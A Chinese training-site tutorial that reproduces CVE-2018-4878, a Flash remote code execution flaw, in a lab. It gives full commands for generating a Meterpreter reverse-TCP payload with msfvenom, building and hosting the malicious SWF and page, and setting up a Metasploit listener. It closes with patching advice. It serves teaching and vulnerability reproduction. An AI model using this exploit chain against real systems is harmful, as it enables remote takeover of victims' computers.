Flash基础入门之[漏洞复现] CVE-2018-4878 Flash 0day
小标 2019-01-24 来源 : 阅读 1598 评论 0

摘要:本文主要向大家介绍了Flash基础入门之[漏洞复现] CVE-2018-4878 Flash 0day,通过具体的内容向大家展现,希望对大家学习Flash基础入门有所帮助。

本文主要向大家介绍了Flash基础入门之[漏洞复现] CVE-2018-4878 Flash 0day,通过具体的内容向大家展现,希望对大家学习Flash基础入门有所帮助。

1、漏洞概述

2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878)。


攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell。


直到2018年2月5号,Adboe才发布补丁来修复此0 day漏洞。



互联网上出现的基于此Flash 0day漏洞进行攻击的样本,其实在2017年底就已经由韩国计算机应急小组(KR-CERT)首次发现。


目前,全网已经有比较成熟的针对此Flash漏洞的利用代码,接下来,我们为大家复现整个过程。


2、漏洞复现环境

Kali Linux + Windows 7 sp1 
渗透机:Kali Linux (ip:172.16.70.216) 
靶机:Windows 7 sp1 (ip:172.16.70.199) 
exp:cve-2018-4878.py 
flash:flashplayer_activex_28.0.0.137.exe

注:此实验环境所用渗透机和靶机,跟之前文章所分享一致。为了节省大家实验时间,我将此实验涉及到的工具全部上传到网盘=> 
链接:https://pan.baidu.com/s/1dotCoCx0AX8sgUaOqFT9vw 密码:0li0 



3、实验流程

①将网盘中的CVE-2018-4878-master目录下载下来,并放入Kali Linux桌面



②使用msfvenom生成shell代码

生成代码,其中lhost为kali的ip地址,lport为自定义的端口号 

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.70.216 lport=8888  -f  python>shellcode.txt 



查看代码文件 
root@kali:~# cat shellcode.txt 


③进入CVE-2018-4878-master目录,编辑CVE-2018-4878.py文件

将上面msfvenom生成的代码覆盖掉原来的代码:


修改CVE-2018-4878.py下面的文件信息(后面会用到,之后保存修改退出): 


④Kali Linux进入CVE-2018-4878-master路径,用Python执行CVE-2018-4878-master.py代码

root@kali:~/Desktop/CVE-2018-4878-master# python cve-2018-4878.py 
root@kali:~/Desktop/CVE-2018-4878-master# ls -l 

⑤Kali Linux开启Apache2服务,并将上面的2个文件放入/var/www/html目录中(apache web路径)

root@kali:~/Desktop/CVE-2018-4878-master# service apache2 start 
root@kali:~/Desktop/CVE-2018-4878-master# cp index2.html /var/www/html/index2.html 
root@kali:~/Desktop/CVE-2018-4878-master# cp exploit.swf /var/www/html/exploit.swf 



此时,Kali Linux上Web服务启动,并且具备index2.html这个页面。只要靶机启用flash并访问了这个页面,则可以直接被控制。

⑥Kali Linux开启Shell会话监听

使用handler监听模块 
msf > use exploit/multi/handler 
回弹一个tcp连接 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp 
设置kali渗透机的ip地址 
msf exploit(handler) > set lhost 172.16.70.216 
设置监听端口,这个需跟上面msfvenom设置的端口一致 
msf exploit(handler) > set lport 8888 
开启监听,等待肉鸡上线 
msf exploit(handler) > exploit


⑦Windows7 安装flash插件,并用IE浏览器访问页面

搜索flash最新的28版本 



安装flash插件 


使用Win7内置IE 8浏览器访问页面://172.16.70.216/index2.html 


⑧Kali Linux 上获取meterpreter shell,并进行管理



实验总结: 

可以看到,最终由于Flash存在CVE-2018-4878这个高危漏洞,导致Windows靶机访问含flash的页面时,直接被Kali Linux控制。 

真实环境下,很多黑客基于此Flash漏洞,结合社会工程学,例如将网页链接放置在诱导邮件中,欺骗大量用户点击,来达到最规模攻击效果。

在这里也呼吁大家:平常要非常小心陌生链接,类似这种“一点就中招”的高级渗透攻击,肯定还有很多没有浮出水面。像这个2017年其实已经出现的漏洞,早就有黑客已经在使用了,而中招者完全不知情,整个攻击手法非常隐蔽。而2018年2月才有安全补丁,在这期间,有多少肉鸡被控制,这个难以想象。很多0day漏洞,黑客比大部分人都要提前知晓,在安全厂商没有出安全公告,或者没有打安全补丁的情况下,一个不小心,就会导致电脑被劫持,数据被窃取,造成极大的损失。


4、漏洞修复

①直接到Adobe Flash官网,下载最新版本:https://get.adobe.com/cn/flashplayer/ 
②安装常见杀毒软件,开启实时防护和杀毒引擎实时升级。

以上就介绍了Flash的相关知识,希望对Flash有兴趣的朋友有所帮助。了解更多内容,请关注职坐标常用软件Flash频道!

本文由 @小标 发布于职坐标。未经许可,禁止转载。
喜欢 | 0 不喜欢 | 0
看完这篇文章有何感觉?已经有0人表态,0%的人喜欢 快给朋友分享吧~
评论(0)
后参与评论

您输入的评论内容中包含违禁敏感词

我知道了

助您圆梦职场 匹配合适岗位
验证码手机号,获得海同独家IT培训资料
选择就业方向:
人工智能物联网
大数据开发/分析
人工智能Python
Java全栈开发
WEB前端+H5

请输入正确的手机号码

请输入正确的验证码

获取验证码

您今天的短信下发次数太多了,明天再试试吧!

提交

我们会在第一时间安排职业规划师联系您!

您也可以联系我们的职业规划师咨询:

小职老师的微信号:z_zhizuobiao
小职老师的微信号:z_zhizuobiao

版权所有 职坐标-一站式AI+学习就业服务平台 沪ICP备13042190号-4
上海海同信息科技有限公司 Copyright ©2015 www.zhizuobiao.com,All Rights Reserved.
 沪公网安备 31011502005948号    

©2015 www.zhizuobiao.com All Rights Reserved